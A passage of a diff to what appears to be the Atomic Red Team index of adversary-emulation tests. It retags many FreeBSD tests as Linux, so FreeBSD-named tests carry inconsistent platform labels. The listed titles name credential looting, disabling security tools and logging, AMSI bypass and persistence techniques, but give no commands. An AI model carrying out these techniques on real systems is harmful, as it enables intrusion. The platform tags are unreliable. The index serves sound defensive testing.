WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique [windows] - [T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) - Atomic Test #1: Make and modify binary from C source [macos, linux] - - Atomic Test #2: Make and modify binary from C source (freebsd) [freebsd] + - Atomic Test #2: Make and modify binary from C source (freebsd) [linux] - Atomic Test #3: Set a SetUID flag on file [macos, linux] - - Atomic Test #4: Set a SetUID flag on file (freebsd) [freebsd] + - Atomic Test #4: Set a SetUID flag on file (freebsd) [linux] - Atomic Test #5: Set a SetGID flag on file [macos, linux] - - Atomic Test #6: Set a SetGID flag on file (freebsd) [freebsd] + - Atomic Test #6: Set a SetGID flag on file (freebsd) [linux] - Atomic Test #7: Make and modify capabilities of a binary [linux] - Atomic Test #8: Provide the SetUID capability to a file [linux] - - Atomic Test #9: Do reconnaissance for files that have the setuid bit set [freebsd, linux] - - Atomic Test #10: Do reconnaissance for files that have the setgid bit set [freebsd, linux] + - Atomic Test #9: Do reconnaissance for files that have the setuid bit set [linux] + - Atomic Test #10: Do reconnaissance for files that have the setgid bit set [linux] - T1117 Regsvr32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1054 Indicator Blocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -430,9 +430,9 @@ - T1198 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1562.006 Impair Defenses: Indicator Blocking](../../T1562.006/T1562.006.md) - Atomic Test #1: Auditing Configuration Changes on Linux Host [linux] - - Atomic Test #2: Auditing Configuration Changes on FreeBSD Host [freebsd] + - Atomic Test #2: Auditing Configuration Changes on FreeBSD Host [linux] - Atomic Test #3: Logging Configuration Changes on Linux Host [linux] - - Atomic Test #4: Logging Configuration Changes on FreeBSD Host [freebsd] + - Atomic Test #4: Logging Configuration Changes on FreeBSD Host [linux] - Atomic Test #5: Disable Powershell ETW Provider - Windows [windows] - Atomic Test #6: Disable .NET Event Tracing for Windows Via Registry (cmd) [windows] - Atomic Test #7: Disable .NET Event Tracing for Windows Via Registry (powershell) [windows] @@ -497,14 +497,14 @@ - T1196 Control Panel Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1562.003 Impair Defenses: HISTCONTROL](../../T1562.003/T1562.003.md) - Atomic Test #1: Disable history collection [linux, macos] - - Atomic Test #2: Disable history collection (freebsd) [freebsd] + - Atomic Test #2: Disable history collection (freebsd) [linux] - Atomic Test #3: Mac HISTCONTROL [macos, linux] - Atomic Test #4: Clear bash history [linux] - Atomic Test #5: Setting the HISTCONTROL environment variable [linux] - Atomic Test #6: Setting the HISTFILESIZE environment variable [linux] - - Atomic Test #7: Setting the HISTSIZE environment variable [freebsd] + - Atomic Test #7: Setting the HISTSIZE environment variable [linux] - Atomic Test #8: Setting the HISTFILE environment variable [linux] - - Atomic Test #9: Setting the HISTFILE environment variable (freebsd) [freebsd] + - Atomic Test #9: Setting the HISTFILE environment variable (freebsd) [linux] - Atomic Test #10: Setting the HISTIGNORE environment variable [linux] - T1556.008 Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -539,7 +539,7 @@ - Atomic Test #5: Remove Administrative Shares [windows] - [T1562.001 Impair Defenses: Disable or Modify Tools](../../T1562.001/T1562.001.md) - Atomic Test #1: Disable syslog [linux] - - Atomic Test #2: Disable syslog (freebsd) [freebsd] + - Atomic Test #2: Disable syslog (freebsd) [linux] - Atomic Test #3: Disable Cb Response [linux] - Atomic Test #4: Disable SELinux [linux] - Atomic Test #5: Stop Crowdstrike Falcon on Linux [linux] @@ -580,7 +580,7 @@ - Atomic Test #40: Suspend History [linux] - Atomic Test #41: Reboot Linux Host via Kernel System Request [linux] - Atomic Test #42: Clear Pagging Cache [linux] - - Atomic Test #43: Disable Memory Swap [freebsd, linux] + - Atomic Test #43: Disable Memory Swap [linux] - Atomic Test #44: Disable Hypervisor-Enforced Code Integrity (HVCI) [windows] - Atomic Test #45: AMSI Bypass - Override AMSI via COM [windows] - Atomic Test #46: AWS - GuardDuty Suspension or Deletion [iaas:aws] @@ -596,7 +596,7 @@ - T1564.009 Resource Forking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1027 Obfuscated Files or Information](../../T1027/T1027.md) - Atomic Test #1: Decode base64 Data into Script [macos, linux] - - Atomic Test #2: Decode base64 Data into Script [freebsd] + - Atomic Test #2: Decode base64 Data into Script [linux] - Atomic Test #3: Execute base64-encoded PowerShell [windows] - Atomic Test #4: Execute base64-encoded PowerShell from Windows Registry [windows] - Atomic Test #5: Execution from Compressed File [windows] @@ -625,7 +625,7 @@ - Atomic Test #5: Regsvr32 Silent DLL Install Call DllRegisterServer [windows] - [T1036.003 Masquerading: Rename System Utilities](../../T1036.003/T1036.003.md) - Atomic Test #1: Masquerading as Windows LSASS process [windows] - - Atomic Test #2: Masquerading as FreeBSD or Linux crond process. [freebsd, linux] + - Atomic Test #2: Masquerading as FreeBSD or Linux crond process. [linux] - Atomic Test #3: Masquerading - cscript.exe running as notepad.exe [windows] - Atomic Test #4: Masquerading - wscript.exe running as svchost.exe [windows] - Atomic Test #5: Masquerading - powershell.exe running as taskhostw.exe [windows] @@ -646,7 +646,7 @@ - T1506 Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1553.004 Subvert Trust Controls: Install Root Certificate](../../T1553.004/T1553.004.md) - Atomic Test #1: Install root CA on CentOS/RHEL [linux] - - Atomic Test #2: Install root CA on FreeBSD [freebsd] + - Atomic Test #2: Install root CA on FreeBSD [linux] - Atomic Test #3: Install root CA on Debian/Ubuntu [linux] - Atomic Test #4: Install root CA on macOS [macos] - Atomic Test #5: Install root CA on Windows [windows] @@ -655,9 +655,9 @@ - [T1027.004 Obfuscated Files or Information: Compile After Delivery](../../T1027.004/T1027.004.md) - Atomic Test #1: Compile After Delivery using csc.exe [windows] - Atomic Test #2: Dynamic C# Compile [windows] - - Atomic Test #3: C compile [freebsd, linux, macos] - - Atomic Test #4: CC compile [freebsd, linux, macos] - - Atomic Test #5: Go compile [freebsd, linux, macos] + - Atomic Test #3: C compile [linux, macos] + - Atomic Test #4: CC compile [linux, macos] + - Atomic Test #5: Go compile [linux, macos] - T1564.007 VBA Stomping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1197 BITS Jobs](../../T1197/T1197.md) - Atomic Test #1: Bitsadmin Download (cmd) [windows] @@ -697,15 +697,15 @@ - T1027.010 Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1130 Install Root Certificate [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1070.004 Indicator Removal on Host: File Deletion](../../T1070.004/T1070.004.md) - - Atomic Test #1: Delete a single file - FreeBSD/Linux/macOS [freebsd, linux, macos] - - Atomic Test #2: Delete an entire folder - FreeBSD/Linux/macOS [freebsd, linux, macos] + - Atomic Test #1: Delete a single file - FreeBSD/Linux/macOS [linux, macos] + - Atomic Test #2: Delete an entire folder - FreeBSD/Linux/macOS [linux, macos] - Atomic Test #3: Overwrite and delete a file with shred [linux] - Atomic Test #4: Delete a single file - Windows cmd [windows] - Atomic Test #5: Delete an entire folder - Windows cmd [windows] - Atomic Test #6: Delete a single file - Windows PowerShell [windows] - Atomic Test #7: Delete an entire folder - Windows PowerShell [windows] - Atomic Test #8: Delete Filesystem - Linux [linux] - - Atomic Test #9: Delete Filesystem - FreeBSD [freebsd] + - Atomic Test #9: Delete Filesystem - FreeBSD [linux] - Atomic Test #10: Delete Prefetch File [windows] - Atomic Test #11: Delete TeamViewer Log Files [windows] - T1158 Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -724,7 +724,7 @@ - [T1036.006 Masquerading: Space after Filename](../../T1036.006/T1036.006.md) - Atomic Test #1: Space After Filename (Manual) [macos] - Atomic Test #2: Space After Filename [macos, linux] - - Atomic Test #3: Space After Filename (FreeBSD) [freebsd] + - Atomic Test #3: Space After Filename (FreeBSD) [linux] - [T1550.002 Use Alternate Authentication Material: Pass the Hash](../../T1550.002/T1550.002.md) - Atomic Test #1: Mimikatz Pass the Hash [windows] - Atomic Test #2: crackmapexec Pass the Hash [windows] @@ -743,7 +743,7 @@ - Atomic Test #3: WMIC bypass using local XSL file [windows] - Atomic Test #4: WMIC bypass using remote XSL file [windows] - [T1564.001 Hide Artifacts: Hidden Files and Directories](../../T1564.001/T1564.001.md) - - Atomic Test #1: Create a hidden file in a hidden directory [freebsd, linux, macos] + - Atomic Test #1: Create a hidden file in a hidden directory [linux, macos] - Atomic Test #2: Mac Hidden file [macos] - Atomic Test #3: Create Windows System File with Attrib [windows] - Atomic Test #4: Create Windows Hidden File with Attrib [windows] @@ -787,11 +787,11 @@ - Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows] - Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows] - Atomic Test #8: Create local account (Linux) [linux] - - Atomic Test #9: Create local account (FreeBSD) [freebsd] + - Atomic Test #9: Create local account (FreeBSD) [linux] - Atomic Test #10: Reactivate a locked/expired account (Linux) [linux] - - Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [freebsd] + - Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux] - Atomic Test #12: Login as nobody (Linux) [linux] - - Atomic Test #13: Login as nobody (freebsd) [freebsd] + - Atomic Test #13: Login as nobody (freebsd) [linux] - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1127 Trusted Developer Utilities Proxy Execution](../../T1127/T1127.md) - Atomic Test #1: Lolbin Jsc.exe compile javascript to exe [windows] @@ -855,11 +855,11 @@ - Atomic Test #24: Disable UAC - Switch to the secure desktop when prompting for elevation via registry key [windows] - [T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) - Atomic Test #1: Sudo usage [macos, linux] - - Atomic Test #2: Sudo usage (freebsd) [freebsd] + - Atomic Test #2: Sudo usage (freebsd) [linux] - Atomic Test #3: Unlimited sudo cache timeout [macos, linux] - - Atomic Test #4: Unlimited sudo cache timeout (freebsd) [freebsd] + - Atomic Test #4: Unlimited sudo cache timeout (freebsd) [linux] - Atomic Test #5: Disable tty_tickets for sudo caching [macos, linux] - - Atomic Test #6: Disable tty_tickets for sudo caching (freebsd) [freebsd] + - Atomic Test #6: Disable tty_tickets for sudo caching (freebsd) [linux] - [T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) - Atomic Test #1: Service Registry Permissions Weakness [windows] - Atomic Test #2: Service ImagePath Change with reg.exe [windows] @@ -881,9 +881,9 @@ - Atomic Test #4: TinyTurla backdoor service w64time [windows] - Atomic Test #5: Remote Service Installation CMD [windows] - [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) - - Atomic Test #1: Cron - Replace crontab with referenced file [freebsd, macos, linux] + - Atomic Test #1: Cron - Replace crontab with referenced file [linux, macos] - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] - - Atomic Test #3: Cron - Add script to /etc/cron.d folder [freebsd] + - Atomic Test #3: Cron - Add script to /etc/cron.d folder [linux] - Atomic Test #4: Cron - Add script to /var/spool/cron/crontabs/ folder [linux] - T1165 Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1547.012 Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) @@ -938,9 +938,9 @@ - T1183 Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1546.005 Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) - Atomic Test #1: Trap EXIT [macos, linux] - - Atomic Test #2: Trap EXIT (freebsd) [freebsd] + - Atomic Test #2: Trap EXIT (freebsd) [linux] - Atomic Test #3: Trap SIGINT [macos, linux] - - Atomic Test #4: Trap SIGINT (freebsd) [freebsd] + - Atomic Test #4: Trap SIGINT (freebsd) [linux] - [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) - Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux] - Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux] @@ -954,15 +954,15 @@ - Atomic Test #2: WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique [windows] - [T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) - Atomic Test #1: Make and modify binary from C source [macos, linux] - - Atomic Test #2: Make and modify binary from C source (freebsd) [freebsd] + - Atomic Test #2: Make and modify binary from C source (freebsd) [linux] - Atomic Test #3: Set a SetUID flag on file [macos, linux] - - Atomic Test #4: Set a SetUID flag on file (freebsd) [freebsd] + - Atomic Test #4: Set a SetUID flag on file (freebsd) [linux] - Atomic Test #5: Set a SetGID flag on file [macos, linux] - - Atomic Test #6: Set a SetGID flag on file (freebsd) [freebsd] + - Atomic Test #6: Set a SetGID flag on file (freebsd) [linux] - Atomic Test #7: Make and modify capabilities of a binary [linux] - Atomic Test #8: Provide the SetUID capability to a file [linux] - - Atomic Test #9: Do reconnaissance for files that have the setuid bit set [freebsd, linux] - - Atomic Test #10: Do reconnaissance for files that have the setgid bit set [freebsd, linux] + - Atomic Test #9: Do reconnaissance for files that have the setuid bit set [linux] + - Atomic Test #10: Do reconnaissance for files that have the setgid bit set [linux] - [T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md) - Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows] - Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows] @@ -1059,9 +1059,9 @@ - [T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) - Atomic Test #1: Add command to .bash_profile [macos, linux] - Atomic Test #2: Add command to .bashrc [macos, linux] - - Atomic Test #3: Add command to .shrc [freebsd] - - Atomic Test #4: Append to the system shell profile [freebsd, linux] - - Atomic Test #5: Append commands user shell profile [freebsd, linux] + - Atomic Test #3: Add command to .shrc [linux] + - Atomic Test #4: Append to the system shell profile [linux] + - Atomic Test #5: Append commands user shell profile [linux] - Atomic Test #6: System shell profile scripts [linux] - Atomic Test #7: Create/Append to .bash_logout [linux] - [T1134.005 Access Token Manipulation: SID-History Injection](../../T1134.005/T1134.005.md) @@ -1098,11 +1098,11 @@ - Atomic Test #1: rc.common [macos] - Atomic Test #2: rc.common [linux] - Atomic Test #3: rc.local [linux] - - Atomic Test #4: rc.local (FreeBSD) [freebsd] + - Atomic Test #4: rc.local (FreeBSD) [linux] - T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1543.002 Create or Modify System Process: SysV/Systemd Service](../../T1543.002/T1543.002.md) - Atomic Test #1: Create Systemd Service [linux] - - Atomic Test #2: Create SysV Service [freebsd] + - Atomic Test #2: Create SysV Service [linux] - Atomic Test #3: Create Systemd Service file, Enable the service , Modify and Reload the service. [linux] - T1547.013 XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -1128,7 +1128,7 @@ - [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md) - Atomic Test #1: At.exe Scheduled task [windows] - Atomic Test #2: At - Schedule a job [linux] - - Atomic Test #3: At - Schedule a job freebsd [freebsd] + - Atomic Test #3: At - Schedule a job freebsd [linux] - [T1055.001 Process Injection: Dynamic-link Library Injection](../../T1055.001/T1055.001.md) - Atomic Test #1: Process Injection via mavinject.exe [windows] - Atomic Test #2: WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique [windows] @@ -1144,11 +1144,11 @@ - Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows] - Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows] - Atomic Test #8: Create local account (Linux) [linux] - - Atomic Test #9: Create local account (FreeBSD) [freebsd] + - Atomic Test #9: Create local account (FreeBSD) [linux] - Atomic Test #10: Reactivate a locked/expired account (Linux) [linux] - - Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [freebsd] + - Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux] - Atomic Test #12: Login as nobody (Linux) [linux] - - Atomic Test #13: Login as nobody (freebsd) [freebsd] + - Atomic Test #13: Login as nobody (freebsd) [linux] - [T1574.012 Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md) - Atomic Test #1: User scope COR_PROFILER [windows] - Atomic Test #2: System Scope COR_PROFILER [windows] @@ -1201,9 +1201,9 @@ - Atomic Test #10: LNK Payload Download [windows] - Atomic Test #11: Mirror Blast Emulation [windows] - [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) - - Atomic Test #1: Cron - Replace crontab with referenced file [freebsd, macos, linux] + - Atomic Test #1: Cron - Replace crontab with referenced file [linux, macos] - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] - - Atomic Test #3: Cron - Add script to /etc/cron.d folder [freebsd] + - Atomic Test #3: Cron - Add script to /etc/cron.d folder [linux] - Atomic Test #4: Cron - Add script to /var/spool/cron/crontabs/ folder [linux] - T1559.001 Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -1271,22 +1271,22 @@ - Atomic Test #3: Create a system level transient systemd service and timer [linux] - T1061 Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1059.004 Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md) - - Atomic Test #1: Create and Execute Bash Shell Script [freebsd, linux, macos] - - Atomic Test #2: Command-Line Interface [freebsd, linux, macos] + - Atomic Test #1: Create and Execute Bash Shell Script [linux, macos] + - Atomic Test #2: Command-Line Interface [linux, macos] - Atomic Test #3: Harvest SUID executable files [linux] - Atomic Test #4: LinEnum tool execution [linux] - - Atomic Test #5: New script file in the tmp directory [freebsd, linux] - - Atomic Test #6: What shell is running [freebsd, linux] - - Atomic Test #7: What shells are available [freebsd, linux] - - Atomic Test #8: Command line scripts [freebsd, linux] + - Atomic Test #5: New script file in the tmp directory [linux] + - Atomic Test #6: What shell is running [linux] + - Atomic Test #7: What shells are available [linux] + - Atomic Test #8: Command line scripts [linux] - Atomic Test #9: Obfuscated command line scripts [linux] - - Atomic Test #10: Obfuscated command line scripts (freebsd) [freebsd] + - Atomic Test #10: Obfuscated command line scripts (freebsd) [linux] - Atomic Test #11: Change login shell [linux] - - Atomic Test #12: Change login shell (freebsd) [freebsd] + - Atomic Test #12: Change login shell (freebsd) [linux] - Atomic Test #13: Environment variable scripts [linux] - - Atomic Test #14: Environment variable scripts (freebsd) [freebsd] + - Atomic Test #14: Environment variable scripts (freebsd) [linux] - Atomic Test #15: Detecting pipe-to-shell [linux] - - Atomic Test #16: Detecting pipe-to-shell (freebsd) [freebsd] + - Atomic Test #16: Detecting pipe-to-shell (freebsd) [linux] - Atomic Test #17: Current kernel information enumeration [linux] - [T1559 Inter-Process Communication](../../T1559/T1559.md) - Atomic Test #1: Cobalt Strike Artifact Kit pipe [windows] @@ -1301,10 +1301,10 @@ - T1168 Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1028 Windows Remote Management [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1059.006 Command and Scripting Interpreter: Python](../../T1059.006/T1059.006.md) - - Atomic Test #1: Execute shell script via python's command mode arguement [freebsd, linux] - - Atomic Test #2: Execute Python via scripts [freebsd, linux] - - Atomic Test #3: Execute Python via Python executables [freebsd, linux] - - Atomic Test #4: Python pty module and spawn function used to spawn sh or bash [freebsd, linux] + - Atomic Test #1: Execute shell script via python's command mode arguement [linux] + - Atomic Test #2: Execute Python via scripts [linux] + - Atomic Test #3: Execute Python via Python executables [linux] + - Atomic Test #4: Python pty module and spawn function used to spawn sh or bash [linux] - T1569 System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1059.003 Command and Scripting Interpreter: Windows Command Shell](../../T1059.003/T1059.003.md) - Atomic Test #1: Create and Execute Batch Script [windows] @@ -1333,7 +1333,7 @@ - [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md) - Atomic Test #1: At.exe Scheduled task [windows] - Atomic Test #2: At - Schedule a job [linux] - - Atomic Test #3: At - Schedule a job freebsd [freebsd] + - Atomic Test #3: At - Schedule a job freebsd [linux] - T1035 Service Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1086 PowerShell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1118 InstallUtil [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -1357,7 +1357,7 @@ - T1150 Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1556.003 Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) - Atomic Test #1: Malicious PAM rule [linux] - - Atomic Test #2: Malicious PAM rule (freebsd) [freebsd] + - Atomic Test #2: Malicious PAM rule (freebsd) [linux] - Atomic Test #3: Malicious PAM module [linux] - T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1044 File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -1394,9 +1394,9 @@ - Atomic Test #4: TinyTurla backdoor service w64time [windows] - Atomic Test #5: Remote Service Installation CMD [windows] - [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) - - Atomic Test #1: Cron - Replace crontab with referenced file [freebsd, macos, linux] + - Atomic Test #1: Cron - Replace crontab with referenced file [linux, macos] - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] - - Atomic Test #3: Cron - Add script to /etc/cron.d folder [freebsd] + - Atomic Test #3: Cron - Add script to /etc/cron.d folder [linux] - Atomic Test #4: Cron - Add script to /var/spool/cron/crontabs/ folder [linux] - T1165 Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1137 Office Application Startup](../../T1137/T1137.md) @@ -1425,9 +1425,9 @@ - Atomic Test #1: Simulate Patching termsrv.dll [windows] - Atomic Test #2: Modify Terminal Services DLL Path [windows] - [T1176 Browser Extensions](../../T1176/T1176.md) - - Atomic Test #1: Chrome/Chromium (Developer Mode) [freebsd, linux, windows, macos] - - Atomic Test #2: Chrome/Chromium (Chrome Web Store) [freebsd, linux, windows, macos] - - Atomic Test #3: Firefox [freebsd, linux, windows, macos] + - Atomic Test #1: Chrome/Chromium (Developer Mode) [linux, windows, macos] + - Atomic Test #2: Chrome/Chromium (Chrome Web Store) [linux, windows, macos] + - Atomic Test #3: Firefox [linux, windows, macos] - Atomic Test #4: Edge Chromium Addon - VPN [windows, macos] - Atomic Test #5: Google Chrome Load Unpacked Extension With Command Line [windows] - T1058 Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -1473,21 +1473,21 @@ - T1031 Modify Existing Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1546.005 Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) - Atomic Test #1: Trap EXIT [macos, linux] - - Atomic Test #2: Trap EXIT (freebsd) [freebsd] + - Atomic Test #2: Trap EXIT (freebsd) [linux] - Atomic Test #3: Trap SIGINT [macos, linux] - - Atomic Test #4: Trap SIGINT (freebsd) [freebsd] + - Atomic Test #4: Trap SIGINT (freebsd) [linux] - [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) - Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux] - Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux] - Atomic Test #3: Dylib Injection via DYLD_INSERT_LIBRARIES [macos] - [T1136.001 Create Account: Local Account](../../T1136.001/T1136.001.md) - Atomic Test #1: Create a user account on a Linux system [linux] - - Atomic Test #2: Create a user account on a FreeBSD system [freebsd] + - Atomic Test #2: Create a user account on a FreeBSD system [linux] - Atomic Test #3: Create a user account on a MacOS system [macos] - Atomic Test #4: Create a new user in a command prompt [windows] - Atomic Test #5: Create a new user in PowerShell [windows] - Atomic Test #6: Create a new user in Linux with `root` UID and GID. [linux] - - Atomic Test #7: Create a new user in FreeBSD with `root` GID. [freebsd] + - Atomic Test #7: Create a new user in FreeBSD with `root` GID. [linux] - Atomic Test #8: Create a new Windows admin user [windows] - T1053.001 At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1179 Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -1503,7 +1503,7 @@ - T1164 Re-opened Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md) - - Atomic Test #1: Modify SSH Authorized Keys [freebsd, macos, linux] + - Atomic Test #1: Modify SSH Authorized Keys [linux, macos] - T1215 Kernel Modules and Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1101 Security Support Provider [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1546.012 Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md) @@ -1623,9 +1623,9 @@ - [T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) - Atomic Test #1: Add command to .bash_profile [macos, linux] - Atomic Test #2: Add command to .bashrc [macos, linux] - - Atomic Test #3: Add command to .shrc [freebsd] - - Atomic Test #4: Append to the system shell profile [freebsd, linux] - - Atomic Test #5: Append commands user shell profile [freebsd, linux] + - Atomic Test #3: Add command to .shrc [linux] + - Atomic Test #4: Append to the system shell profile [linux] + - Atomic Test #5: Append commands user shell profile [linux] - Atomic Test #6: System shell profile scripts [linux] - Atomic Test #7: Create/Append to .bash_logout [linux] - [T1547.002 Authentication Package](../../T1547.002/T1547.002.md) @@ -1670,12 +1670,12 @@ - Atomic Test #1: rc.common [macos] - Atomic Test #2: rc.common [linux] - Atomic Test #3: rc.local [linux] - - Atomic Test #4: rc.local (FreeBSD) [freebsd] + - Atomic Test #4: rc.local (FreeBSD) [linux] - T1209 Time Providers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1159 Launch Agent [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1543.002 Create or Modify System Process: SysV/Systemd Service](../../T1543.002/T1543.002.md) - Atomic Test #1: Create Systemd Service [linux] - - Atomic Test #2: Create SysV Service [freebsd] + - Atomic Test #2: Create SysV Service [linux] - Atomic Test #3: Create Systemd Service file, Enable the service , Modify and Reload the service. [linux] - T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1547.013 XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -1703,7 +1703,7 @@ - [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md) - Atomic Test #1: At.exe Scheduled task [windows] - Atomic Test #2: At - Schedule a job [linux] - - Atomic Test #3: At - Schedule a job freebsd [freebsd] + - Atomic Test #3: At - Schedule a job freebsd [linux] - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1546.007 Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md) - Atomic Test #1: Netsh Helper DLL Registration [windows] @@ -1719,11 +1719,11 @@ - Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows] - Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows] - Atomic Test #8: Create local account (Linux) [linux] - - Atomic Test #9: Create local account (FreeBSD) [freebsd] + - Atomic Test #9: Create local account (FreeBSD) [linux] - Atomic Test #10: Reactivate a locked/expired account (Linux) [linux] - - Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [freebsd] + - Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux] - Atomic Test #12: Login as nobody (Linux) [linux] - - Atomic Test #13: Login as nobody (freebsd) [freebsd] + - Atomic Test #13: Login as nobody (freebsd) [linux] - [T1574.012 Hijack Execution Flow: 